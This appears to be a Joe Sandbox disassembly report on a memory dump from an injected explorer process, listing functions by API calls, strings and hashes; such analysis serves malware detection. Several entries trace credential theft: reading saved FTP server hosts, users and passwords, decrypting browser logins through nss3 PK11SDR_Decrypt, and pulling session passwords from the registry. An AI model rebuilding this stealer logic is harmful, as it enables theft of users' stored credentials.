                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: memset
                                                                        • String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"
                                                                        • API String ID: 2221118986-594550510
                                                                        • Opcode ID: d529eaa6fac02c3e7f76456c0c690c7b35bea7645ce660dc7fc7d8a02e104475
                                                                        • Instruction ID: 26923915b0ad1f39d38a21fbf02ad761e945dcf2ab2a1f06d1468d5cbb1cef83
                                                                        • Opcode Fuzzy Hash: d529eaa6fac02c3e7f76456c0c690c7b35bea7645ce660dc7fc7d8a02e104475
                                                                        • Instruction Fuzzy Hash: A3C1A0716047129FCB14DF24D580A2AB7E2BFC8704F14AA1DF889A7291DB31ED56CB92
                                                                        APIs
                                                                        • CoCreateInstance.COMBASE(00E562B0,00000000,00000001,00E562A0,?), ref: 00E0445F
                                                                        • SysAllocString.OLEAUT32(?), ref: 00E044AA
                                                                        • lstrcmpiW.KERNEL32(RecentServers,?), ref: 00E0456E
                                                                        • lstrcmpiW.KERNEL32(Servers,?), ref: 00E0457D
                                                                        • lstrcmpiW.KERNEL32(Settings,?), ref: 00E0458C
                                                                          • Part of subcall function 00E011E1: lstrlenW.KERNEL32(?,74DEF360,00000000,?,00000000,?,00E046E3), ref: 00E011ED
                                                                          • Part of subcall function 00E011E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00E0120F
                                                                          • Part of subcall function 00E011E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00E01231
                                                                        • lstrcmpiW.KERNEL32(Server,?), ref: 00E045BE
                                                                        • lstrcmpiW.KERNEL32(LastServer,?), ref: 00E045CD
                                                                        • lstrcmpiW.KERNEL32(Host,?), ref: 00E04657
                                                                        • lstrcmpiW.KERNEL32(Port,?), ref: 00E04679
                                                                        • lstrcmpiW.KERNEL32(User,?), ref: 00E0469F
                                                                        • lstrcmpiW.KERNEL32(Pass,?), ref: 00E046C5
                                                                        • wsprintfW.USER32 ref: 00E0471E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcmpi$String$BinaryCrypt$AllocCreateInstancelstrlenwsprintf
                                                                        • String ID: %s:%s$Host$LastServer$Pass$Port$RecentServers$Server$Servers$Settings$User
                                                                        • API String ID: 2230072276-1234691226
                                                                        • Opcode ID: e69b623e1f6cf4c474bb94ed4435e5a7fd800d4882945881457a4e5d50c9b100
                                                                        • Instruction ID: b18d45e24b21fc2c2a3fa804c3553a90eb749d2543758d0bd4e28e3fa330d333
                                                                        • Opcode Fuzzy Hash: e69b623e1f6cf4c474bb94ed4435e5a7fd800d4882945881457a4e5d50c9b100
                                                                        • Instruction Fuzzy Hash: 20B12AB1204302AFD700DF64C944E2AB7E9EFC9749F04995CF685AB1A0DB71ED4ACB52
                                                                        APIs
                                                                          • Part of subcall function 00E01000: GetProcessHeap.KERNEL32(00000008,?,00E011C7,?,?,00000001,00000000,?), ref: 00E01003
                                                                          • Part of subcall function 00E01000: RtlAllocateHeap.NTDLL(00000000), ref: 00E0100A
                                                                          • Part of subcall function 00E01090: lstrlenW.KERNEL32(?,?,00000000,00E017E5), ref: 00E01097
                                                                          • Part of subcall function 00E01090: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 00E010A8
                                                                          • Part of subcall function 00E019B4: lstrlenW.KERNEL32(00000000,00000000,00000000,00E02CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 00E019C4
                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,00000000), ref: 00E02503
                                                                        • SetCurrentDirectoryW.KERNEL32(00000000), ref: 00E0250A
                                                                        • LoadLibraryW.KERNEL32(00000000), ref: 00E02563
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00E02570
                                                                        • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00E02591
                                                                        • GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 00E0259E
                                                                        • GetProcAddress.KERNEL32(00000000,SECITEM_FreeItem), ref: 00E025AB
                                                                        • GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 00E025B8
                                                                        • GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 00E025C5
                                                                        • GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 00E025D2
                                                                        • GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 00E025DF
                                                                          • Part of subcall function 00E0190B: lstrlen.KERNEL32(?,?,?,?,00000000,00E02783), ref: 00E0192B
                                                                          • Part of subcall function 00E0190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,00E02783), ref: 00E01930
                                                                          • Part of subcall function 00E0190B: lstrcat.KERNEL32(00000000,?), ref: 00E01946
                                                                          • Part of subcall function 00E0190B: lstrcat.KERNEL32(00000000,00000000), ref: 00E0194A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$lstrlen$CurrentDirectory$Heaplstrcat$AllocateByteCharLibraryLoadMultiProcessWide
                                                                        • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$SECITEM_FreeItem$nss3.dll$sql:
                                                                        • API String ID: 3366569387-3272982511
                                                                        • Opcode ID: 267c559ea86bbf64fbfe20bbe26bf20001865eb40fa9f8a2e54f75413a8f1da5
                                                                        • Instruction ID: cb72ed5b8aeb579fbef39a5dbcd0918239008789381ab3d0d7f359ff93ab46af
                                                                        • Opcode Fuzzy Hash: 267c559ea86bbf64fbfe20bbe26bf20001865eb40fa9f8a2e54f75413a8f1da5
                                                                        • Instruction Fuzzy Hash: DA416830F003018FCB25AF367C5852F3AE9DF8478674814AEE941B72E1DBB58C898B51
                                                                        APIs
                                                                          • Part of subcall function 00E05BF5: memset.NTDLL ref: 00E05C07
                                                                        • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 00E060E1
                                                                        • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 00E060EC
                                                                        • _alldiv.NTDLL(?,?,000003E8,00000000), ref: 00E06113
                                                                        • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 00E0618E
                                                                        • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 00E061B5
                                                                        • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 00E061C1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: _alldiv$_allrem$memset
                                                                        • String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W
                                                                        • API String ID: 2557048445-1989508764
                                                                        • Opcode ID: 902e461341858612ef1576bfc8dd0c677462b28c88a482aa3128c6cea56c84ac
                                                                        • Instruction ID: 4d1da7d6f0f4216fab17b71f74c3c2589375d93e15f3353cabd9cb47ec9aa951
                                                                        • Opcode Fuzzy Hash: 902e461341858612ef1576bfc8dd0c677462b28c88a482aa3128c6cea56c84ac
                                                                        • Instruction Fuzzy Hash: 44B160B3A087439BD7359E24CC85B7B7BD4EB40308F242959F8C2B61E1E761DDE48A91
                                                                        APIs
                                                                        • memcmp.NTDLL(00E5637A,BINARY,00000007), ref: 00E1D324
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: memcmp
                                                                        • String ID: %.16g$%lld$%s(%d)$(%.20s)$(blob)$,%d$,%s%s$BINARY$NULL$k(%d$program$vtab:%p
                                                                        • API String ID: 1475443563-3683840195
                                                                        • Opcode ID: 0429deddcc341e6dbfd104494e3ab9e4810b41a1815f2090c204d92c6e0773a6
                                                                        • Instruction ID: feab803a0fedecbc175caa4fd690c506ec9117ffa04f2a8f5856485aa8aa1201
                                                                        • Opcode Fuzzy Hash: 0429deddcc341e6dbfd104494e3ab9e4810b41a1815f2090c204d92c6e0773a6
                                                                        • Instruction Fuzzy Hash: 2751D331A0C700ABC721DF54DC41AEAB3E5AB45701F146C69FDA2BB141E770ED99CBA2
                                                                        APIs
                                                                          • Part of subcall function 00E019E5: RegOpenKeyExW.KERNELBASE(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00E01AE2,PortNumber,00000000,00000000), ref: 00E01A1E
                                                                          • Part of subcall function 00E019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00E01A3C
                                                                          • Part of subcall function 00E019E5: RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00E01A75
                                                                          • Part of subcall function 00E019E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00E01AE2,PortNumber,00000000,00000000), ref: 00E01A98
                                                                          • Part of subcall function 00E0482C: lstrlenW.KERNEL32(?), ref: 00E04845
                                                                          • Part of subcall function 00E0482C: lstrlenW.KERNEL32(?), ref: 00E0488F
                                                                          • Part of subcall function 00E0482C: lstrlenW.KERNEL32(?), ref: 00E04897
                                                                        • wsprintfW.USER32 ref: 00E049A7
                                                                        • wsprintfW.USER32 ref: 00E049B9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$QueryValuewsprintf$CloseOpen
                                                                        • String ID: %s:%u$%s:%u/%s$HostName$Password$RemoteDirectory$UserName
                                                                        • API String ID: 2889301010-4273187114
                                                                        • Opcode ID: 9f968f9d95b736cd67c613c1f5b0865f045f7c50eaaa0a1ab5f3415ef4b62b9c
                                                                        • Instruction ID: 53585a42421da78e0db231c8699e6ba4c1646ede61a66d7210c57731b2a219b8
                                                                        • Opcode Fuzzy Hash: 9f968f9d95b736cd67c613c1f5b0865f045f7c50eaaa0a1ab5f3415ef4b62b9c
                                                                        • Instruction Fuzzy Hash: BF3124E0B043055BC710AF66CD0182BB6EDEFC974CB85A96DF644B72C1DAB2CC8183A1
                                                                        APIs
                                                                        • memcpy.NTDLL(?,?,?,?,00000000), ref: 00E0FB32
                                                                        • memcpy.NTDLL(?,?,00000000,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 00E0FB4D
                                                                        • memcpy.NTDLL(?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 00E0FB60
                                                                        • memcpy.NTDLL(?,?,?,?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030), ref: 00E0FB95
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy
                                                                        • String ID: -journal$-wal$immutable$nolock
                                                                        • API String ID: 3510742995-3408036318
                                                                        • Opcode ID: 7f334f584d329b74f9e39c11a3435e5addb00f957ee05678dad1220ce380e226
                                                                        • Instruction ID: 65e753018e2d49c0a28a3c6f0b81330fcb22d7e2cc55058b2407d4bc23e16bfa
                                                                        • Opcode Fuzzy Hash: 7f334f584d329b74f9e39c11a3435e5addb00f957ee05678dad1220ce380e226
                                                                        • Instruction Fuzzy Hash: B3D1D2B16083418FDB24DF24C88171ABBE1AF95314F08597DFC98AB392DB74D845CB52
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: %$-x0$NaN
                                                                        • API String ID: 0-62881354
                                                                        • Opcode ID: 24b8b6b41cd87a0a3314c73a92ec319f2312a94ac4bad9a6d58bde2eb37d37dd
                                                                        • Instruction ID: fd9a44e416294fd9f79832bae4fb6dc195532c859887d3d40dea9f112aea3fed
                                                                        • Opcode Fuzzy Hash: 24b8b6b41cd87a0a3314c73a92ec319f2312a94ac4bad9a6d58bde2eb37d37dd
                                                                        • Instruction Fuzzy Hash: D1D1E470E0C3828BD7258E28849036BBFE1AF95308F28695DF8C1B72D1D674E9C5D792
                                                                        APIs
                                                                        • GetHGlobalFromStream.COMBASE(?,?), ref: 00E018A7
                                                                        • GlobalLock.KERNEL32(WK), ref: 00E018B6
                                                                        • GlobalUnlock.KERNEL32(?), ref: 00E018F4
                                                                          • Part of subcall function 00E01000: GetProcessHeap.KERNEL32(00000008,?,00E011C7,?,?,00000001,00000000,?), ref: 00E01003
                                                                          • Part of subcall function 00E01000: RtlAllocateHeap.NTDLL(00000000), ref: 00E0100A
                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00E018E8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Global$Heap$AllocateFromLockMemoryMoveProcessStreamUnlock
                                                                        • String ID: WK$WK
                                                                        • API String ID: 1688112647-3649781841
                                                                        • Opcode ID: 4ba4b01c3f17e6a9fc279264c8419fb91d4c21d7c87807ac24d8710b51d0c343
                                                                        • Instruction ID: d368e4fbdbc3e483e6ee782e21afc2ade7f8f330d6d2632dfa9c16d034c330f4
                                                                        • Opcode Fuzzy Hash: 4ba4b01c3f17e6a9fc279264c8419fb91d4c21d7c87807ac24d8710b51d0c343
                                                                        • Instruction Fuzzy Hash: 0C018675204345AFCB155F66DC1885F7BE9EF84355B00953EF445EB2A1DF31C9449B20
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: -x0$NaN
                                                                        • API String ID: 0-3447725786
                                                                        • Opcode ID: a8e70d36553cda8c5af3a9969e6d116a3a3d8b0a87bd80d49425060d44de6503
                                                                        • Instruction ID: 90c1421b6687f4af9228c87a48159bdc48fdde9660b354742062136661169656
                                                                        • Opcode Fuzzy Hash: a8e70d36553cda8c5af3a9969e6d116a3a3d8b0a87bd80d49425060d44de6503
                                                                        • Instruction Fuzzy Hash: 39E10270E0C3828BD7258E28849036BBBE1AF95348F28695DF8C1B72D1D674EDC5C792
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: -x0$NaN
                                                                        • API String ID: 0-3447725786
                                                                        • Opcode ID: c2862ac0b23d84769b0f1f6fc479763a10df6a3473dd06207bb3b2605e5f53da
                                                                        • Instruction ID: b35d4c1fd96aad854fa9eba4cd1e3fe386a41f31839438c2a72e52c8364dd4a2
                                                                        • Opcode Fuzzy Hash: c2862ac0b23d84769b0f1f6fc479763a10df6a3473dd06207bb3b2605e5f53da
                                                                        • Instruction Fuzzy Hash: C2E1C270A0C3828BD7258E28C49076ABBE1AF95308F14695DF8C1B73D1D674EDC5DB92
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: -x0$NaN
                                                                        • API String ID: 0-3447725786
                                                                        • Opcode ID: 2748b0ccd09b257a0143c486d80fc9166ad4af7e1ecbec091a6be5d8a49e06d7
                                                                        • Instruction ID: 16e815d2c3aae95bbee8a6600a5a188a4ff0615358eb64f2ac2c9211d57b7cd6
                                                                        • Opcode Fuzzy Hash: 2748b0ccd09b257a0143c486d80fc9166ad4af7e1ecbec091a6be5d8a49e06d7
                                                                        • Instruction Fuzzy Hash: 19E1D370E0C3828BD7258E28C49076ABBE1AF95308F18695DF8C1B72D1D674E9C5DB92
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: -x0$NaN
                                                                        • API String ID: 0-3447725786
                                                                        • Opcode ID: eb9238d6f575c45d3d7045a06b3fded67c485412d9ad67b7af94433af3d8b09d
                                                                        • Instruction ID: 630549b30a8191453abc9024fb177ee9bc3a54e28bae8a91463d071782ee8c8e
                                                                        • Opcode Fuzzy Hash: eb9238d6f575c45d3d7045a06b3fded67c485412d9ad67b7af94433af3d8b09d
                                                                        • Instruction Fuzzy Hash: AEE1C370A0C3828FD7258E28C49076ABBE1AF99308F14695DF8C1B72D1D674E9C5DB52
                                                                        APIs
                                                                        • _aulldvrm.NTDLL(00000000,00000002,0000000A,00000000), ref: 00E0720E
                                                                        • _aullrem.NTDLL(00000000,?,0000000A,00000000), ref: 00E07226
                                                                        • _aulldvrm.NTDLL(00000000,00000000,?), ref: 00E0727B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: _aulldvrm$_aullrem
                                                                        • String ID: -x0$NaN
                                                                        • API String ID: 105165338-3447725786
                                                                        • Opcode ID: 4d12177be524f723d4213d58026a5e1cf15b6c3864f62ee84cc740538ccfeb5d
                                                                        • Instruction ID: c7081ad4cc13b51a827411b9e79f4c1c9242792fa5807d73225c7d64d722d146
                                                                        • Opcode Fuzzy Hash: 4d12177be524f723d4213d58026a5e1cf15b6c3864f62ee84cc740538ccfeb5d
                                                                        • Instruction Fuzzy Hash: 13D1D370E0C3828BD7258E28849076ABFE1AF95308F28695DF8C1B72D1D674EDC5D792
                                                                        APIs
                                                                        • _allmul.NTDLL(00000000,?,0000000A,00000000), ref: 00E08AAD
                                                                        • _allmul.NTDLL(?,?,0000000A,00000000), ref: 00E08B66
                                                                        • _allmul.NTDLL(?,00000000,0000000A,00000000), ref: 00E08C9B
                                                                        • _alldvrm.NTDLL(?,00000000,0000000A,00000000), ref: 00E08CAE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: _allmul$_alldvrm
                                                                        • String ID: .
                                                                        • API String ID: 115548886-248832578
                                                                        • Opcode ID: a53c6e23925d7b5495c6b0c228a36da531ff9e728667803b40e1a0c9dd9225bc
                                                                        • Instruction ID: d5f466f6d87485e6d7235681e73918bc4a22c6b59038c27bbb1236a6f5e64b4f
                                                                        • Opcode Fuzzy Hash: a53c6e23925d7b5495c6b0c228a36da531ff9e728667803b40e1a0c9dd9225bc
                                                                        • Instruction Fuzzy Hash: 68D1F4B190C7858BD714DF48868022AFBF4FBA5315F042D6EF6D5B62C1DBB08985CB86
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: memset
                                                                        • String ID: ,$7$9
                                                                        • API String ID: 2221118986-1653249994
                                                                        • Opcode ID: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                                                                        • Instruction ID: 10f352e0284791a3610a22b246f24fe05258863cf3e1684ea5e793f8a2a1bba1
                                                                        • Opcode Fuzzy Hash: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                                                                        • Instruction Fuzzy Hash: D6316B725083949FD334DF60D840B8FBBE8AF85340F10892EF989A7251EB75954CCBA2
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(00000000,00000000,?,00E02E75,PathToExe,00000000,00000000), ref: 00E01BCC
                                                                        • StrStrIW.SHLWAPI(00000000,.exe,?,00E02E75,PathToExe,00000000,00000000), ref: 00E01BF0
                                                                        • StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,00E02E75,PathToExe,00000000,00000000), ref: 00E01C05
                                                                        • lstrlenW.KERNEL32(00000000,?,00E02E75,PathToExe,00000000,00000000), ref: 00E01C1C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen
                                                                        • String ID: .exe
                                                                        • API String ID: 1659193697-4119554291
                                                                        • Opcode ID: a44b1b3611b0eabc4ef538e83c02e1e7a57352295353a9e13bf56f606b41d59f
                                                                        • Instruction ID: 7265de4533e8f1cfdf0461799748ac4411c7605c3b9503c1b7165d7c35b5a01c
                                                                        • Opcode Fuzzy Hash: a44b1b3611b0eabc4ef538e83c02e1e7a57352295353a9e13bf56f606b41d59f
                                                                        • Instruction Fuzzy Hash: D0F0C2303517209EE3386F359C85BBBA2A4EF013467506CAEE046EB1E1FB60CC85C759
                                                                        APIs
                                                                          • Part of subcall function 00E01000: GetProcessHeap.KERNEL32(00000008,?,00E011C7,?,?,00000001,00000000,?), ref: 00E01003
                                                                          • Part of subcall function 00E01000: RtlAllocateHeap.NTDLL(00000000), ref: 00E0100A
                                                                        • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00E02127
                                                                        • _alldiv.NTDLL(?,?,00989680,00000000), ref: 00E0213A
                                                                        • wsprintfA.USER32 ref: 00E0214F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: HeapTime$AllocateFileProcessSystem_alldivwsprintf
                                                                        • String ID: %li
                                                                        • API String ID: 4120667308-1021419598
                                                                        • Opcode ID: 3308fc4617f7f0469ba55f697240ed77d0243cdb8e2076f6929b479ddd3bb8ee
                                                                        • Instruction ID: 2da3acdc21a738c44b010312c72b3a7808b8d9d7cfcc661cbf985621711a8fec
                                                                        • Opcode Fuzzy Hash: 3308fc4617f7f0469ba55f697240ed77d0243cdb8e2076f6929b479ddd3bb8ee
                                                                        • Instruction Fuzzy Hash: 03E092326413187BD7213BB89D06EAE7B6CDB40B17F404A95FA04B6182E5624A6883D5
                                                                        APIs
                                                                        • _allmul.NTDLL(?,00000000,00000018), ref: 00E1316F
                                                                        • _allmul.NTDLL(-00000001,00000000,?,?), ref: 00E131D2
                                                                        • _alldiv.NTDLL(?,?,00000000), ref: 00E132DE
                                                                        • _allmul.NTDLL(00000000,?,00000000), ref: 00E132E7
                                                                        • _allmul.NTDLL(?,00000000,?,?), ref: 00E13392
                                                                          • Part of subcall function 00E116CD: memset.NTDLL ref: 00E1172B
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: _allmul$_alldivmemset
                                                                        • String ID:
                                                                        • API String ID: 3880648599-0
                                                                        • Opcode ID: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                                                                        • Instruction ID: 2f1c59a45451c6b7c44af75651b54bc1d246f5ab66508b85ecf8607e17992de8
                                                                        • Opcode Fuzzy Hash: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                                                                        • Instruction Fuzzy Hash: 75D1AE716083418FDB24DF69C4807AEB7E1BF88708F14592DF9A5A3251DB70DE85CB92
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: FOREIGN KEY constraint failed$new$old
                                                                        • API String ID: 0-384346570
                                                                        • Opcode ID: 286490db8e10b04a5b51844ac13b3ab66268f333705dfd1912501918f6632175
                                                                        • Instruction ID: 5d32629277a09d2c24db0e84e651897aed34425275619fb1d3a9b533e1bc6cbb
                                                                        • Opcode Fuzzy Hash: 286490db8e10b04a5b51844ac13b3ab66268f333705dfd1912501918f6632175
                                                                        • Instruction Fuzzy Hash: EDD179707083009FD718DF24D985B2FBBE9ABC8744F14692EF985AB291DB70D841CB92
                                                                        APIs
                                                                        • _alldiv.NTDLL(000000FF,7FFFFFFF,?,?), ref: 00E096E7
                                                                        • _alldiv.NTDLL(00000000,80000000,?,?), ref: 00E09707
                                                                        • _alldiv.NTDLL(00000000,80000000,?,?), ref: 00E09739
                                                                        • _alldiv.NTDLL(00000001,80000000,?,?), ref: 00E0976C
                                                                        • _allmul.NTDLL(?,?,?,?), ref: 00E09798
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: _alldiv$_allmul
                                                                        • String ID:
                                                                        • API String ID: 4215241517-0
                                                                        • Opcode ID: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                                                                        • Instruction ID: f95b0805e9af9a61f5743e88d0a8ba4f5eba074eb7eb786f4ac6733d9c900994
                                                                        • Opcode Fuzzy Hash: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                                                                        • Instruction Fuzzy Hash: 9121E1331286552AD7345D199CD0B6B76C8CB91799F2C752FFD11B22E3E99388C180A2
                                                                        APIs
                                                                        • _allmul.NTDLL(?,00000000,00000000), ref: 00E1B1B3
                                                                        • _alldvrm.NTDLL(?,?,00000000), ref: 00E1B20F
                                                                        • _allrem.NTDLL(?,00000000,?,?), ref: 00E1B28A
                                                                        • memcpy.NTDLL(?,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00000000), ref: 00E1B298
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2907845320.0000000000E01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E01000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e01000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: _alldvrm_allmul_allremmemcpy
                                                                        • String ID:
                                                                        • API String ID: 1484705121-0
                                                                        • Opcode ID: 7f149f4fafbbaf87986fcdd5fa071cfd5fd9f51ff2967b4dfa165bb06474c4bd
                                                                        • Instruction ID: 47638823bd8c72665011213cc7126d859632297125bfccd726482b6135b2a9b8
